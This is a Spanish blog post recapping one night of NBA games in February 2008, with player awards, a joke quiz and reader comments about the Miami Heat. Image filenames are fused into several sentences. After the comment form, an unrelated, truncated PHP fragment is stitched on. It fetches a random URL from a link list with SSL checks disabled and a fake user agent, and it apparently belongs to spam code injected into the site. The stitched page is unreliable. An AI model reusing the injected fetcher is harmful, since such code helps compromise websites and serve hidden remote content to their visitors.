La crónica (04/02/08)

05 de February de 2008 por MagicJohnson32

Muchos partidos, muchas grandes actuaciones individuales, algunas decepciones y, sobre todo, muchas cosas que contar es lo que tenemos hoy en nuestra crónica. Un vídeo y vamos con el resumen de lo sucedido en la NBA la pasada madrugada:

La crónica:

En Orlando, los Magic pagaron los platos rotos del ridículo hecho por los Mavs la noche anterior en Detroit. Los de Avery Johnson salieron lanzados y controlaron desde el primer momento hasta el final, dominaron el rebote dejando a Dwight Howard en sólo 7 capturas y superaron a los Magic pese al primer triple-doble de Hedo Turkoglu. Howard, Nowitzki, Terry y Bass lograron 84 puntos y pese a que los locales se llegaron a situar 3 abajo en el últimos cuarto, los Mavsjoshblocksandre acabaron sentenciando 107-98. En Atlanta, el partido parecía decantarse para los Sixers con un 32-14 en el primer cuarto; sin embargo, los Hawks reaccionaron de la mano de Josh Smith, quien colocó 6 tapones en el segundo cuarto para un total de 9 y que firmó además 19 puntos, 9 asistencias, 6 rebotes y 4 robos. Las buenas actuaciones de Andre Miller, con 29-6-6, e Iguodala, con 22-7-4, las compensó Childress desde el banquillo con 21 puntos y 9 de 11 en tiros. Al final, una canasta y un tapón de Al Horford aseguraron la victoria de Atlanta 91-96.

Los Heat siguen buscando el fondo del pozo en el que se encuentran, y siguen cayendo, y siguen sin encontrarlo. Ante los Raptors y en su propia pista encajaron la mayor derrota de la temporada, un 114-82 encarrilado desde el cuarto inicial con un parcial de 33-12. Los canadienses, además del abultado triunfo, contaron con la buena noticia del regreso de TJ Ford, que jugó cerca de 17 minutos. De nuevo Bosh y Bargnani destacaron en anotación y Calderón firmó doble-doble con grandes procentajes, mientras que lo único positivo en los Heat fueron los 17 puntos sin fallo de Dorrell Wright.

giantscrowdmadisonEn Nueva York, los únicos jugadores locales que recibieron los aplausos del Madison fueron los tres miembros de los Giants, campeones de la Super Bowl, que acudieron al partido. Por lo demás, la historia fue la habitual. El regreso de Kaman y Maggette llevó a los Clippers a la victoria en pista de los Knicks, que no pudieron contar con Nate Robinson y perdieron a Quentin Richardson. El conjunto visitante, en el que siete jugadores anotaron más de 10 puntos, logró un 52-34 en la segunda mitad que le permitió imponerse por 103-94.

Los Rockets lograron en Minneapolis su octava victoria a domicilio consecutiva en partido en el que Al Jefferson superó claramente a Yao pero McGrady, con 26-6-7 y dos canastas en los últimos 70 segundos de partido, dio el triunfo a su equipo 92-86. Jefferson finalizó con 33 puntos (14/26), 16 rebotes, 3 tapones, 3 robos y 2 asistencias, muy por encima de los 16-5-2-2 de Yao. Por su parte, los Suns superaron a Charlotte 104-118 con 7 triples de Raja Bell y 5 de Barbosa, quien se fue hasta los 30 puntos. Bell logró 24, los mismos que Amare, quien añadió 11 rebotes y aiversonbuzzer4 tapones. Jason Richardson, con 25 puntos, 5 rebotes y 4 asistencias, fue el más destacado de los Bobcats, que no contaron con Gerald Wallace.

En Salt Lake City, Deron Williams convirtió su duelo contra Chris Paul en una demostración de que él también merecía la elección para el All-Star Game. Deron se exhibió con 29 puntos, 11 de 13 en tiros de campo, 11 asistencias y dejando a Paul en 6 puntos, 6 asistencias y 5 pérdidas en 27 minutos de juego. De este modo, hizo muy fácil el triunfo de los Jazz sobre los Hornets 88-110 pese a los 24 puntos de Pargo. Boozer y Korver fueron los mejores aliados de Williams con 19 puntos y 17 rebotes del primero y 20 puntos con 6 de 8 en triples del segundo. En Portland, los Blazers vivieron un nuevo final de infarto y una derrota en la prórroga ante los Nuggets. Los culpables fueron Carmelo Anthony, autor de 28 puntos, 15 rebotes y 5 asistencias, y Allen Iverson, que firmó 25 puntos, 8 asistencias, 6 rebotes, 3 robos y la canasta ganadora a 0:09 para el final y que dejó el marcador en 105-103. Brandon Roy se acercó al triple doble con 26 puntos, 7 rebotes y 8 asistencias pero no fue suficiente para llevarse el duelo de la NorthWest.

Por último, los Bulls vencieron en Seattle gracias a la recuperación de Joe Smith tras superar unas molestias en la rodilla y una gripe, y que anoche logró 25 puntos, 10 rebotes y 2 tapones. deroncp3Durant y Szczerbiak anotaron 20 y 21 puntos respectivamente, y otros cinco jugadores locales superaron la decena pero los Sonics volvieron a pagar su pobre defensa y permitieron 23 rebotes ofensivos a los Bulls, 8 de ellos a un Ben Wallace que repartió además 7 asistencias. Pese a no contar con Deng y perder a Hinrich en el tramo final del partido, Chicago anotó con mucha facilidad y pudo asegurar el triunfo por 118-108.

Nuestro MVP: Triple doble de Hedo Turkoglu, 29-6-6 de Andre Miller, 19-6-9 y 9 tapones de Josh Smith, 28-15-5 de Carmelo Anthony, 26-7-8 de Brandon Roy… Día de actuaciones completísimas pero por encima de todas sobresalen los 33 puntos y 16 rebotes del jefe de los Wolves, Al Jefferson, y los 29 puntos, 11 asistencias y 11 de 13 en tiros de campo de Deron Williams.

El rookie: Obviando el buen partido de Kevin Durant y la sobriedad de Al Horford, hoy hay que destacar los 14 puntos y 4 rebotes de Aaron Gray y los 13 puntos y 7 rebotes de Carl Landry, que va encontrando minutos en la rotación de los Houston Rockets.

La sorpresa: Josh Powell, Dorell Wright, Wally Szczerbiak… jugadores que han realizado un partido por encima de sus medias habituales. Pero nada tan espectacular como los 7 puntos, 10 rebotes y… ¡7 asistencias! de Ben Wallace.

La decepción: Cuando la dinámica del equipo es negativa es muy complicado cambiarla pero también es algo que distingue a los buenísimos jugadores de los grandes jugadores. Dwyane Wade ha vuelto a verse arrastrado por su equipo y ha terminado el partido con unos tristes 12 puntos, 2 rebotes y 4 asistencias.

Pasatiempos: ¿Por qué está tan serio Dwyane Wade?

A) Está reflexionando sobre que traspaso le alejaría más de Miami, de Ricky Davis, de Shaquille O’Neal, de Mark Blount, de Jason Williams, de Pat Riley, etc, etc…

B) Está contemplado la paliza que su equipo está recibiendo de mano de los Toronto Raptors.

C) Está intentando entender el misterio de la Santísima Trinidad.

D) Intenta desvelar los misterios que oculta Lost, sobre todo el de los osos polares y el de los muertos que no están muertos según lo que entiende normalmente la gente.

E) Está pensado que es mucho más sencillo entender el secreto de la Santísima Trinidad, reflexionar sobre el origen del universo y demostrar empíricamente la existencia de Dios, que desvelar Lost.

Respuesta correcta: la B y seguramente también la A. El bueno de Dwyane está viviendo sus peores días desde que llegó a la NBA. El premio para el que haya acertado la respuesta correcta es una colección completa de DVD con la serie Lost, más una guía con explicaciones claras, precisas, simples y concisas sobre todos y cada uno de los misterios de la serie. ¿Cómo? ¿Que eso no existe? Pues entonces un DVD con los partidos en los que Shaq ha resultado determinante este año. Es decir, 1.

Terminamos con la canasta de la noche, la que ha dado el triunfo a los Nuggets en Portland:

 

Comenta

6 comentarios a esta entrada

  1. telekoman dice:
    #1

    Al Jefferson es una bestia parda, y Dorell Wright apunta muy buenas maneras….

      Citar

  2. MagicJohnson32 dice:
    #2

    Qué duro es lo de Miami. Y aún pueden dar gracias que la apuesta les dio el anillo el primer año porque si no estarían como están y sin el título. Este verano liberan los contratos de Ricky y Jason, casi 16 kilos, pero Shaq y Blount tienen contratos largos y O’Neal da cada vez menos garantías. A ver cómo maneja esto Riley.

      Citar

  3. Jabho dice:
    #3

    Tener a Shaq en tu equipo no tiene sentido si no aspiras al título. Su mayor aportación seria en un buen equipo y que llegados los PlayOffs se ponga fino y sea determinante. Pero que rinda una regular entera parece imposible.

    Wade ha sido campeón muy joven. Digamos que esa cuenta la tiene saldada antes de tenerla pendiente como muchos otros. La clave es si quiere conducir a un equipo que durante unos años pase por una reconstrucción… tiempo tendria, ganas quién sabe. Pero lo de Miami a corto plazo no parezca que tenga solución.

      Citar

  4. MagicJohnson32 dice:
    #4

    Es cierto que no debe de estar desesperado como otros por lograr el anillo. Pero haber sido campeón hace año y medio y verse ahora metido en el absoluto desastre que son los Heat… no sé, me da que Wade no aguantará mucho.

      Citar

  5. Viva_Dirk dice:
    #5

    Bueno, creo que no debemos perder la perspectiva. Esta temporada de Miami está siendo un desastre, y eso les llevará casi seguro un top-5 del siguiente draft a sus filas. Eso, con Wade podria ser suficiente para volver a play-offs, la cuestión es si Miami se moverá antes del plazo vendiendo esos 2 expirings, para fichar a alguien de nivel(Kidd, Bibby, A.Miller).

    Con un movimiento de ese estilo y la elección del draft, Wade no deberia tener problemas en quedarse.

      Citar

  6. telekoman dice:
    #6

    A todo esto, viendo los dos vídeos me surge una pregunta. ¿Por qué los defensores del jugador al que le han hecho un aclarado, esperan a que el personaje en cuestión arranque? Si esperas, lo más normal es que el tío te lleve a su terreno y la enchfe ajustando el tiempo para que tú no puedas hacer la siguiente jugada. Pues en lugar de eso, vete a por él, fuerzale un poco. Si haces falta mala suerte, pero al menos eres tú quien marca el ritmo, no él, que está tranquilamente viendo el marcador de tiempo y sabiendo de antemano lo que va a hacer y cuando. En fin, que no lo entiendo. Debe ser que no he jugado suficiente a esto.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>